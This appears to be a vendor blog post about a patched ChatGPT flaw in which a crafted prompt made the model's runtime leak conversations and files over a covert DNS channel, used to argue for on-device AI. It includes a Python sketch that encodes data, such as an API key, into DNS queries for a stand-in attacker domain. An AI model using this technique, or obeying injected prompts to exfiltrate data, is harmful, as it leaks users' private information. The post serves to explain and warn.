Signal

ChatGPT data-exfiltration flaw patched — hidden DNS channel leaked full conversations

A single malicious prompt could silently forward ChatGPT chat content, uploaded files, and AI-generated summaries out through a covert DNS channel. The flaw was disclosed and patched in February 2026. The incident is the argument for local-first in miniature: data never leaves the boundary if there is no outbound channel to abuse.

Our take

Why this matters for local-first

A single crafted prompt was enough to turn ChatGPT's own runtime into an outbound exfiltration channel. Entire conversations, attached files, and AI-generated summaries could be silently routed out over DNS — a channel most enterprise filters don't even inspect.
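To see why DNS makes such an effective covert channel, consider how little it takes to smuggle data through it. The sketch below is not the actual exploit — it is a generic illustration of the well-known DNS-exfiltration technique, with a hypothetical attacker domain. Data is encoded into the leftmost labels of lookups for a domain the attacker controls; ordinary recursive resolvers then deliver those labels straight to the attacker's authoritative nameserver, so the traffic looks like routine name resolution to most perimeter filters.

```python
import base64

def encode_for_dns(data: bytes, attacker_domain: str, label_max: int = 63) -> list[str]:
    """Encode arbitrary bytes as a series of DNS query names.

    Each query carries a chunk of the payload in its leftmost label.
    The resolver chain forwards the lookup to the authoritative
    nameserver for attacker_domain, which logs the labels and
    reassembles the payload. (attacker_domain is hypothetical.)
    """
    # Base32 keeps labels within DNS's case-insensitive a-z, 0-9 alphabet.
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    # DNS limits a single label to 63 octets, so chunk accordingly.
    chunks = [encoded[i:i + label_max] for i in range(0, len(encoded), label_max)]
    # A leading sequence number lets the receiver reorder queries
    # that arrive out of order.
    return [f"{i}.{chunk}.{attacker_domain}" for i, chunk in enumerate(chunks)]

queries = encode_for_dns(b"user: my API key is sk-...", "exfil.example.com")
```

The point of the sketch is the asymmetry: the sender needs only the ability to trigger name lookups, which nearly every runtime with network access has, while the defender needs to inspect and correlate DNS traffic that most enterprise filters pass through untouched.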

Check Point disclosed the flaw and OpenAI patched it. That's the happy ending. The uncomfortable part is the class of failure: once your working data lives inside someone else's runtime, every new feature (code execution, tool calls, browsing) becomes a new potential leak path. Each one needs independent auditing. Each one is outside your control.

This is the argument for local-first, compressed into one incident. If the model and the data never leave the boundary you operate, there is no outbound channel to abuse. Not "a stronger filter" — no channel. You cannot exfiltrate what never had a route out.

AvenBox runs the model on device. No telemetry, no runtime sandbox you don't control, no hidden channels shipped to you under the label of a feature.

Source

Read the original reporting

Check Point Research →
